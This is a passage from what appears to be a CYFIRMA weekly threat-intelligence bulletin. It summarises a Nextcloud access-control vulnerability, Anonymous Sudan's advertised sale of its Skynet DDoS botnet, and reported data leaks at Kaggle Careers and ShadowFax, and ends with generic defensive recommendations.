  • Target Technology: Messaging Software
  • Vulnerability: CVE-2023-48239 (CVSS Base Score 8.5)
  • Vulnerability Type: Improper Access Control

Summary:
The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

Relevancy & Insights:
The vulnerability exists due to improper access restrictions.

Impact:
A remote user can update any personal or global external storage and make them inaccessible for everyone else as well.

Affected Products: https[:]//github[.]com/nextcloud/security-advisories/security/advisories/GHSA-f962-hw26-g267

Recommendations:
Monitoring and Detection: Implement monitoring and detection mechanisms to identify unusual system behavior that might indicate an attempted exploitation of this vulnerability.

TOP 5 AFFECTED PRODUCTS OF THE WEEK
This week, CYFIRMA researchers have observed significant impacts on various products due to a range of vulnerabilities. The following are the top 5 most affected products.

Latest Cyber-Attacks, Incidents, and Breaches

Anonymous Sudan Launches ‘Cyber Monday Sale’ for Skynet Godzilla DDoS Botnet

  • Threat Actors: Anonymous Sudan
  • Attack Type: DDoS
  • Objective: Operational Disruption
  • Target Geographies: Worldwide
  • Business Impact: Operational Disruption

Summary:
Anonymous Sudan, a threat actor, is running a “Cyber Monday Sales Offer” for its Skynet Godzilla DDoS botnet. Speculation suggests that health claims about the group’s founder and financial difficulties may be a marketing ploy to boost sales. The dark web post advertises Skynet as the DDoS service used in their attacks, emphasizing its potency. Unusually, the group offers this tool as a service, contrary to typical cybercriminal behavior. The post hints at merging their tool with an unspecified entity, creating a more powerful combination, though the advantages remain unclear. The pricing details indicate that access to Skynet DDoS is offered at $100 for a day, $600 for a week, and $1700 monthly. The entity’s identity and the enhanced tool’s potential benefits are left ambiguous. The offer is valid until November 28. Skynet, the DDoS service provided by Anonymous Sudan, has showcased its capability by launching attacks on several prominent targets. Notable victims include tech giants such as Apple and Telegram, cloud services like Azure, cybersecurity vendor Sucuri, content delivery network StackPath, and gaming giant PlayStation.

Relevancy & Insights:
Anonymous Sudan has gained notoriety among hacktivists by targeting prominent organizations with overwhelming DDoS attacks. In such a scenario, any endorsement of tools/services by Anonymous Sudan would carry benefits both monetarily and in gaining a larger subscriber base.

ETLM Assessment:
CYFIRMA assesses that the global impact of the Anonymous Sudan Skynet Sale is substantial. The sale of DDoS services serves as a strategic maneuver to bolster their influence within the hacking community, causing Operational Disruption for sales companies. Particularly, this tactic has a pronounced effect on script kiddies who admire such hackers and seek rapid notoriety. This underscores the critical need for governments and businesses to prioritize cybersecurity and address these concerns promptly.

Data Leaks

Kaggle Careers Data Advertised in Leak Site

  • Attack Type: Data Leaks
  • Target Industry: Business Services
  • Target Geography: The United States of America
  • Objective: Data Theft, Financial Gains
  • Business Impact: Data Loss, Reputational Damage

Summary:
CYFIRMA Research team observed a potential data leak related to Kaggle Careers, {www[.]kaggle[.]com}. Kaggle Careers is the world’s largest online data science competition community, with more than 4 million members across 194 countries. Kaggle’s Careers network fell victim to a data breach that resulted in 3,000,000 companies having their wage and business information leaked. The breached data includes SL NO, CASE STATUS, EMPLOYER NAME, SOC NAME, JOB TITLE, FULL TIME POSITION, PREVAILING WAGE, and additional confidential information.

Source: Underground forums

Relevancy & Insights:
Opportunistic cybercriminals motivated by financial gains are always on the lookout for exposed and vulnerable systems as well as applications. The majority of these attackers operate in underground forums, engaging in related conversations and buying/selling stolen digital goods. Unlike other financially motivated attackers such as ransomware groups or extortion groups, who often publicize their attacks, these attackers prefer to operate under the radar. They gain access and steal valuable data by taking advantage of an unpatched system or exploiting a vulnerability in an application or system. The stolen data is then advertised for sale in underground forums, resold, and repurposed by other attackers in their own attacks.

ETLM Assessment:
Although the cause of the Kaggle Careers data leak remains unclear, the threat actors responsible have a history of carrying out breaches for both political and financial motives. For instance, the same threat actor recently put up for sale sensitive information from organizations such as General Electric and DARPA, demonstrating their involvement in both politically and financially motivated cyber intrusions. CYFIRMA assesses U.S. institutions without robust security measures and infrastructure are expected to face an elevated risk of potential cyberattacks from this threat actor.

Other Observations

CYFIRMA Research team observed a potential data leak related to ShadowFax, {www[.]shadowfax[.]in}. Shadowfax Technologies is a company that operates in the Logistics and Supply Chain industry. ShadowFax Technologies, a company with a focus on delivery services, experienced a data breach resulting in the unauthorized exposure of information belonging to 5 million users. The compromised data includes User ID, MSG ID, Mobile, Sender, Sent time, Provider, Status MSG, Message, and other sensitive details.

Source: Underground forums

STRATEGIC RECOMMENDATIONS

  • Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, and active network monitoring through next-generation security solutions, together with a ready-to-go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.

MANAGEMENT RECOMMENDATIONS

  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of the risk-based information security strategy, the security controls applied, and the proper implementation of security technologies, followed by corrective actions, remediations, and lessons learned.
  • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromise, and are measured against real attacks the organization receives.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
  • Test detection processes to ensure awareness of anomalous events, communicate anomalies in a timely manner, and continuously evolve these processes to keep up with refined ransomware threats.

TACTICAL RECOMMENDATIONS

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improve incident response, increase the visibility of security metrics, and rapidly execute security checklists.
  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthen defences based on the tactical intelligence provided.
  • Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security controls such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), device fingerprinting, IP blacklisting, rate-limiting, and account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.